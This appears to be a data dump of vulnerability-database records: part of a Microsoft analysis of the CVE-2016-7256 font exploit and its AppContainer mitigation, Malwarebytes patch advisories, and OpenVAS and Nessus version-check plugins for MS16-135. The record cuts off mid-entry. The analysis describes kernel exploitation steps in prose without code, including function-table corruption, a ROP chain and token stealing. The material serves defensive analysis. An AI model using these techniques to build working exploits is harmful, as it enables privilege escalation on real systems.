2016, unidentified actors began to use an implant detected as \u201cHenkray\u201d in low-volume attacks primarily focused on targets in South Korea. Later, in November 2016, these attackers were detected exploiting a flaw in the Windows font library (CVE-2016-7256) to elevate privileges and install the Henkray backdoor on targeted computers with older versions of Windows.\n\nThe font samples found on affected computers were specifically manipulated with hardcoded addresses and data to reflect actual kernel memory layouts. This indicates the likelihood that a secondary tool dynamically generated the exploit code at the time of infiltration.\n\n\n\n_Figure 5. Auto-generation of font file with exploit_\n\n \n\nThis secondary executable or script tool, which has not been recovered, appears to prepare and drop the font exploit, calculating and preparing the hardcoded offsets needed to exploit the kernel API and the kernel structures on the targeted system. Through deep forensic inspection of the binary data found in samples, we extracted all the hardcoded offsets and ascertained the kernel version targeted by this exploit: Windows 8 64-bit.\n\n### Function table corruption for initial code execution\n\nThe font exploit uses _fa_Callbacks_ to corrupt the function table and achieve initial code execution. The callback is called from the CFF parsing function. The following snippet shows a corrupted _ftell_ pointer to a _nt!qsort+0x39_ location in kernel code.\n\n\n\n_Figure 6. fa_Callbacks table corruption_\n\n \n\nThe following snippet shows the code that calls the corrupt function pointer leading to a kernel ROP chain.\n\n\n\n_Figure 7. fa_Callbacks.ftell function call code_\n\n \n\nWhen the corrupted function is called, the control jumps to the first ROP gadget at nt!qsort+0x39, which adjusts stack pointer and initializes some register values from stack values.\n\n\n\n_Figure 8. First ROP gadget_\n\n \n\nAfter the first gadget, the stack points to a kernel ROP chain which calls to _ExAllocatePoolWithTag_ call to reserve shellcode memory. Another ROP gadget will copy the first 8 bytes of the stage 1 shellcode to the allocated memory.\n\n\n\n_Figure 9. Copying the stage 1 shellcode_\n\n \n\n### Shellcode and privilege escalation\n\nThe stage 1 shellcode is very small. Its main function is to copy the main body of the shellcode to newly allocated memory and run them with a JMP RAX control transfer.\n\n\n\n_Figure 10. Stage 1 shellcode_\n\n \n\nThe main shellcode runs after the copy instructions. The main shellcode\u2014also a small piece of code\u2014performs a well-known token-stealing technique. It then copies the token pointer from a SYSTEM process to the target process, achieving privilege escalation. Both the SYSTEM process and target process PIDs, as well as certain offsets for the kernel APIs needed by the shellcode, are hardcoded in the font sample.\n\n\n\n_Figure 11. Token replacement technique_\n\n \n\n### Mitigating font exploits with AppContainer\n\nWhen opening the malicious font sample on Windows 10 Anniversary Update, font parsing happens completely in AppContainer instead of the kernel. AppContainer provides an isolated sandbox that effectively prevents font exploits (among other types of exploits) from gaining escalated privileges. The isolated sandbox considerably reduces font parsing as an attack surface.\n\n\n\n_Figure 12. AppContainer protects against untrusted fonts in Windows 10 Anniversary Update_\n\n \n\nWindows 10 Anniversary Update also includes additional validation for font file parsing. In our tests, the specific exploit code for CVE-2016-7256 simply fails these checks and is unable to reach vulnerable code.\n\n\n\n_Figure 13. Windows 10 font viewer error_\n\n \n\n## Conclusion: Fighting the good fight with exploit mitigation and layered detection\n\nWhile fixing a single-point vulnerability helps neutralize a specific bug, Microsoft security teams continue to look into opportunities to introduce more and more mitigation techniques. Such mitigation techniques can break exploit methods, providing a medium-term tactical benefit, or close entire classes of vulnerabilities for long-term strategic impact.\n\nIn this article, we looked into recent attack campaigns involving two zero-day kernel exploits. We saw how exploit mitigation techniques in Windows 10 Anniversary Update, which was released months before these zero-day attacks, managed to neutralize not only the specific exploits but also their exploit methods. As a result, these mitigation techniques are significantly reducing attack surfaces that would have been available to future zero-day exploits.\n\nBy delivering these mitigation techniques, we are increasing the cost of exploit development, forcing attackers to find ways around new defense layers. Even the simple tactical mitigation against popular RW primitives forces the exploit authors to spend more time and resources in finding new attack routes. By moving font parsing code to an isolated container, we significantly reduce the likelihood that font bugs are used as vectors for privilege escalation.\n\nIn addition to the techniques mentioned in this article, Windows 10 Anniversary Update introduced [many other mitigation techniques](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>) in core Windows components and the Microsoft Edge browser, helping protect customers from entire classes of exploits for very recent and even undisclosed vulnerabilities.\n\nFor effective post-breach detection, including cover for the multiple stages of attacks described in this blog post, sign up for Window Defender ATP. The service leverages built-in sensors to raise alerts for exploits and other attack activity, providing corresponding threat intelligence. Customers interested in the Windows Defender ATP post-breach detection solution can find more information [here](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>).\n\n_Microsoft would like to thank [KrCERT](<https://www.krcert.or.kr/>) for their collaboration in protecting customers and for providing the sample for CVE-2016-7256._\n\n \n\n_Matt Oh and Elia Florio, __Windows Defender ATP Research Team_\n\n \n\n_Updates:_\n\nJan 18, 2017 - Corrected the spelling of Henkray backdoor.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-13T21:28:49", "title": "Hardening Windows 10 with zero-day exploit mitigations", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7855", "CVE-2016-7256", "CVE-2016-7255"], "modified": "2017-01-13T21:28:49", "href": "https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/", "id": "MMPC:11F96360F6FFA25D4AC7028A2E9CAA9D", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "malwarebytes": [{"lastseen": "2022-02-10T00:00:00", "description": "If you\u2019re running Windows 10, it\u2019s time to stop delaying those patches and bring your systems up to date as soon as possible.\n\nBleeping Computer [reports](<https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/>) that a researcher has come up with a bypass for an older bug, which could serve up some major headaches if left to fester. Those headaches will take the form of unauthorised admin privileges in Windows 10, alongside creating new admin accounts and more besides.\n\n## What happened the first time round?\n\nBack in 2021, Microsoft patched an exploit which had [been in use](<https://www.bleepingcomputer.com/news/security/recently-fixed-windows-zero-day-actively-exploited-since-mid-2020/>) since mid-2020. Classed as \u201chigh-severity\u201d, \u201cCVE-2021-1732 - Windows Win32k Elevation of Privilege Vulnerability\u201d allowed attackers to elevate privileges to admin level.\n\nFooling potential victims by having them open bogus email attachments is all it would take to get one foot in the door via code execution. It popped up in a [targeted attack](<https://ti.dbappsecurity.com.cn/blog/articles/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) related to the [Bitter APT](<https://www.forbes.com/sites/thomasbrewster/2021/09/17/exodus-american-tech-helped-india-spy-on-china>) campaign. According to the report, numbers were \u201cvery limited\u201d and struck victims in China.\n\n## What\u2019s happening now?\n\nMultiple exploits have dropped for another elevation of privilege vulnerability known as [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>). This is a bypass for the previously mentioned [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>) which was fixed back in February 2021. CVE-2022-21882 was fixed by Microsoft via updates from January 2022. However, sys admins out there may well have skipped the updates due to [various bugs](<https://www.bleepingcomputer.com/news/microsoft/new-windows-server-updates-cause-dc-boot-loops-break-hyper-v/>) which came along for the update ride.\n\n## Time to get fixing things?\n\nIt is absolutely time to get fixing things. The exploit is now out there in the wild, and as Bleeping Computer notes, it \u201caffects all supported support versions of Windows 10 before the January 2022 Patch Tuesday updates\u201d. \n\nWriters at Bleeping Computer were able to get it to work in testing, and others have confirmed it for themselves:\n\n> Interestingly, [#MDE](<https://twitter.com/hashtag/MDE?src=hash&ref_src=twsrc%5Etfw>) detects this PoC as CVE-2021-1732. \nThis is understandable since this [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2022-21882 is a bypass of [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2021-1732. \nGeneric [#LPE](<https://twitter.com/hashtag/LPE?src=hash&ref_src=twsrc%5Etfw>) detection [#KQL](<https://twitter.com/hashtag/KQL?src=hash&ref_src=twsrc%5Etfw>) query works in this case too.[#BlueTeam](<https://twitter.com/hashtag/BlueTeam?src=hash&ref_src=twsrc%5Etfw>) [#ThreatHunting](<https://twitter.com/hashtag/ThreatHunting?src=hash&ref_src=twsrc%5Etfw>)<https://t.co/01El9wPjk0> \n/1 <https://t.co/vM2apKJsI6>\n> \n> -- Bhabesh (@bh4b3sh) [January 29, 2022](<https://twitter.com/bh4b3sh/status/1487449316117516288?ref_src=twsrc%5Etfw>)\n\n## Is there any reason to wait for February\u2019s Patch Tuesday?\n\nIf you\u2019re one of the hold-outs who ran into errors last time around, waiting isn\u2019t advisable. Microsoft already issued an [OOB (out of band) update](<https://www.theverge.com/2022/1/18/22889670/microsoft-windows-server-update-vpn-refs-domain-patch>) to address the multiple errors caused by the January patch. As per Microsoft\u2019s January 17th [notification about the release](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#2777>):\n\n> "Microsoft is releasing Out-of-band (OOB) updates today, January 17, 2022, for some versions of Windows. This update addresses issues related to VPN connectivity, Windows Server Domain Controllers restarting, Virtual Machines start failures, and ReFS-formatted removable media failing to mount."\n\nThings being what they are, it\u2019s likely time to get in there and apply the OOB update (if you haven\u2019t already) and put this one to rest.\n\nMicrosoft is putting a fair bit of work into figuring out where weak points lie in the patching process, making use of its Update Connectivity data. The [current estimate](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/achieve-better-patch-compliance-with-update-connectivity-data/ba-p/3073356>) is a device needs a minimum of two continuous connected hours, and six total connected hours after an update is released to reliably make it through the updating process.\n\nIf this sounds like your network, and if you\u2019re still waiting to take the plunge, you\u2019ve hopefully got little to lose by making that big update splash as soon as you possibly can.\n\nThe post [Apply those updates now: CVE bypass offers up admin privileges for Windows 10](<https://blog.malwarebytes.com/malwarebytes-news/2022/02/apply-those-updates-now-cve-bypass-offers-up-admin-privileges-for-windows-10/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-01T11:07:29", "type": "malwarebytes", "title": "Apply those updates now: CVE bypass offers up admin privileges for Windows 10", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-01T11:07:29", "id": "MALWAREBYTES:6A30A2B661E06D2D7D26479F27BB0EF3", "href": "https://blog.malwarebytes.com/malwarebytes-news/2022/02/apply-those-updates-now-cve-bypass-offers-up-admin-privileges-for-windows-10/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-13T13:09:08", "description": "Traditionally the second Tuesday of the month is Microsoft\u2019s \u201cpatch Tuesday\u201d. This is the day when they roll out all the available patches for their software, and their operating systems in particular.\n\nSince there were no less than 56 patches in this month\u2019s issue we will focus on the most important ones. Not that 56 is an awful lot. There were [more than 80 in January](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/microsoft-issues-83-patches-one-for-actively-exploited-vulnerability/>).\n\n### Microsoft CVEs by importance\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The most notable CVE\u2019s in this update were:\n\n * [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732>) Windows Win32k elevation of privilege (EoP) vulnerability. This one we listed first as it\u2019s actively exploited in the wild. With a EoP vulnerability attackers can raise their authorization permissions beyond those initially granted. For example, if an attacker gains access to a system but only has read-only permissions they can use an EoP vulnerability to raise them to \u201cread and write\u201d, giving them an option to make unwanted changes.\n * [CVE-2021-26701](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26701>) a .NET Core Remote Code Execution (RCE) vulnerability. A remote code execution (RCE) attack happens when a threat actor illegally accesses and manipulates a computer or server without authorization from its owner. This is the only critical bug Microsoft listed as publicly known.\n * [CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) an IPv4 security vulnerability concerning source routing behavior. Microsoft adds to say: IPv4 Source routing is considered insecure and is blocked by default in Windows; however, a system will process the request and return an ICMP message denying the request.\n * [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) an IPv6 security vulnerability concerning the reassembly limit and related to the previous one. The reassembly limit controls the IP fragmentation, which is an Internet Protocol (IP) process that breaks packets into smaller fragments, so that the resulting pieces can pass through a link with a smaller maximum transmission unit (MTU) than the original packet size. The fragments are reassembled by the receiving host. Apparently an attacker could construe packets leading to a situation where a large number of fragments could lead to code execution.\n * [CVE-2021-1721](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1721>) a .NET Core and Visual Studio Denial of Service vulnerability. A Denial of Service attack is focused on making a resource (site, application, server) unavailable for the purpose it was designed.\n * [CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) and [CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) are both Windows Fax Service RCE problems. It's important to remember that even if you don\u2019t use \u201cWindows Fax and Scan\u201d, the Windows Fax Services is enabled by default.\n * [CVE-2021-1733](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1733>) is for Sysinternals\u2019 PsExec Elevation of Privilege vulnerability. While this one is listed as not likely to be exploited, the tool itself is worth keeping an eye on, because it's so popular with cybercriminals. They like it because, as a legitimate administration tool, it isn't normally detected as malicious software by default.\n\nIf you are all about prioritizing your updates, these are the ones that we recommend doing first. Everyone else is advised to install the updates at their earliest convenience.\n\nOne other notable thing is the default enabling of the Domain Controller enforcement mode. This was done to counter the effects of the ZeroLogon vulnerability which is being exploited in the wild. We already covered the full story of [ZeroLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/the-story-of-zerologon/>) where this change was announced.\n\n### Adobe Reader for a change\n\nAnd while you are about to start your update cycles, you may want to have a look at this one from Adobe. Because this one is already actively being exploited as well. Where Adobe was notoriously famous for the bugs in their Flash Player, which has now reached [end-of-life](<https://blog.malwarebytes.com/awareness/2021/01/adobe-flash-player-reaches-end-of-life/>), occasionally a vulnerability in their Reader attracts some attention.\n\n[CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21017>) is a critical heap-based buffer overflow flaw. Heap is the name for a region of a process\u2019 memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.\n\nSo, by creating a specially crafted input, attackers could use this vulnerability to write code into a memory location where they normally wouldn\u2019t have access. In their advisory Adobe states that it has received a report that CVE-2021-21017 has been exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\n\nBoth Adobe Acrobat and Adobe Reader will automatically detect if a new version of the software is available. The program will check for a new version when you launch either Acrobat or Reader as an application and will prompt you to install a new version when it's available. IT administrators can control the update settings by using the [Adobe Customization Wizard](<https://www.adobe.com/nl/devnet-docs/acrobatetk/tools/Wizard/WizardDC/index.html>).\n\nStay safe, everyone!\n\nThe post [Big Patch Tuesday: Microsoft and Adobe fix in-the-wild exploits](<https://blog.malwarebytes.com/malwarebytes-news/2021/02/big-patch-tuesday-microsoft-and-adobe-fix-in-the-wild-exploits/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-10T17:26:33", "type": "malwarebytes", "title": "Big Patch Tuesday: Microsoft and Adobe fix in-the-wild exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-21017", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24094", "CVE-2021-26701"], "modified": "2021-02-10T17:26:33", "id": "MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/02/big-patch-tuesday-microsoft-and-adobe-fix-in-the-wild-exploits/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-06-10T19:47:59", "description": "This host is missing a important security\n update according to Microsoft Bulletin MS16-135", "cvss3": {}, "published": "2016-11-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7246", "CVE-2016-7218", "CVE-2016-7214", "CVE-2016-7255", "CVE-2016-7215"], "modified": "2020-06-08T00:00:00", "id": "OPENVAS:1361412562310809092", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809092", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809092\");\n script_version(\"2020-06-08T14:40:48+0000\");\n script_cve_id(\"CVE-2016-7214\", \"CVE-2016-7215\", \"CVE-2016-7218\", \"CVE-2016-7246\",\n \"CVE-2016-7255\");\n script_bugtraq_id(92835);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-11-09 10:09:34 +0530 (Wed, 09 Nov 2016)\");\n script_name(\"Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a important security\n update according to Microsoft Bulletin MS16-135\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - A kernel Address Space Layout Randomization (ASLR) bypass error.\n\n - The windows kernel-mode driver fails to properly handle objects in memory.\n\n - The windows bowser.sys kernel-mode driver fails to properly handle objects\n in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to retrieve the memory address of a kernel object, run arbitrary code\n in kernel mode and to log on to an affected system and runs a specially crafted\n application that could exploit the vulnerabilities and take control of an\n affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 Version 1511 x32/x64\n\n - Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows 7 x32/x64 Service Pack 1 and prior\n\n - Microsoft Windows Vista x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1 and prior\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3199135\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/ms16-135\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2, winVistax64:3, win2008x64:3,\n win2012:1, win2012R2:1, win8_1:1, win8_1x64:1, win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Win32k.sys\");\nbrVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\drivers\\Bowser.sys\");\nif(!winVer && !brVer){\n exit(0);\n}\n\nif(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:winVer, test_version:\"6.0.6002.19706\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19706\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24028\"))\n {\n Vulnerable_range1 = \"6.0.6002.23000 - 6.0.6002.24028\";\n VULN1 = TRUE ;\n }\n else if(version_is_less(version:brVer, test_version:\"6.0.6002.19698\"))\n {\n Vulnerable_range2 = \"Less than 6.0.6002.19698\";\n VULN2 = TRUE ;\n }\n else if(version_in_range(version:brVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24020\"))\n {\n Vulnerable_range2 = \"6.0.6002.23000 - 6.0.6002.24020\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && brVer)\n{\n if(version_is_less(version:brVer, test_version:\"6.1.7601.23567\"))\n {\n Vulnerable_range2 = \"Less than 6.1.7601.23567\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2012:1) > 0 && brVer)\n{\n if(version_is_less(version:brVer, test_version:\"6.2.9200.22004\"))\n {\n Vulnerable_range2 = \"Less than 6.2.9200.22004\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0 && winVer)\n{\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18524\"))\n {\n Vulnerable_range1 = \"Less than 6.3.9600.18524\";\n VULN1 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win10:1, win10x64:1) > 0 && winVer)\n{\n if(version_is_less(version:winVer, test_version:\"10.0.10240.16384\"))\n {\n Vulnerable_range1 = \"Less than 10.0.10240.16384\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"10.0.10586.0\", test_version2:\"10.0.10586.19\"))\n {\n Vulnerable_range1 = \"10.0.10586.0 - 10.0.10586.19\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.446\"))\n {\n Vulnerable_range1 = \"10.0.14393.0 - 10.0.14393.446\";\n VULN1 = TRUE ;\n }\n}\n\nif(VULN1)\n{\n report = 'File checked: ' + sysPath + \"\\system32\\Win32k.sys\"+ '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nelse if(VULN2)\n{\n report = 'File checked: ' + sysPath + \"\\system32\\drivers\\Bowser.sys\"+ '\\n' +\n 'File version: ' + brVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range2 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-12T16:11:18", "description": "The remote Windows host is missing a security update. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the Windows kernel that allows a local attacker, via a specially crafted application, to bypass the Address Space Layout Randomization (ASLR) feature and retrieve the memory address of a kernel object. (CVE-2016-7214)\n\n - Multiple elevation of privilege vulnerabilities exist in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit these, via a specially crafted application, to execute arbitrary code in kernel mode. (CVE-2016-7215, CVE-2016-7246, CVE-2016-7255)\n\n - An information disclosure vulnerability exists in the bowser.sys kernel-mode driver due to improper handling objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2016-7218)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-08T00:00:00", "type": "nessus", "title": "MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7214", "CVE-2016-7215", "CVE-2016-7218", "CVE-2016-7246", "CVE-2016-7255"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS16-135.NASL", "href": "https://www.tenable.com/plugins/nessus/94636", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94636);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2016-7214\",\n \"CVE-2016-7215\",\n \"CVE-2016-7218\",\n \"CVE-2016-7246\",\n \"CVE-2016-7255\"\n );\n script_bugtraq_id(\n 93991,\n 94000,\n 94004,\n 94063,\n 94064\n );\n script_xref(name:\"MSFT\", value:\"MS16-135\");\n script_xref(name:\"MSKB\", value:\"3198234\");\n script_xref(name:\"MSKB\", value:\"3194371\");\n script_xref(name:\"MSKB\", value:\"3197867\");\n script_xref(name:\"MSKB\", value:\"3197868\");\n script_xref(name:\"MSKB\", value:\"3197873\");\n script_xref(name:\"MSKB\", value:\"3197874\");\n script_xref(name:\"MSKB\", value:\"3197876\");\n script_xref(name:\"MSKB\", value:\"3197877\");\n script_xref(name:\"MSKB\", value:\"3198585\");\n script_xref(name:\"MSKB\", value:\"3198586\");\n script_xref(name:\"MSKB\", value:\"3200970\");\n script_xref(name:\"IAVA\", value:\"2016-A-0322\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135)\");\n script_summary(english:\"Checks the version of ntoskrnl.exe or the installed rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows kernel that allows a local attacker, via 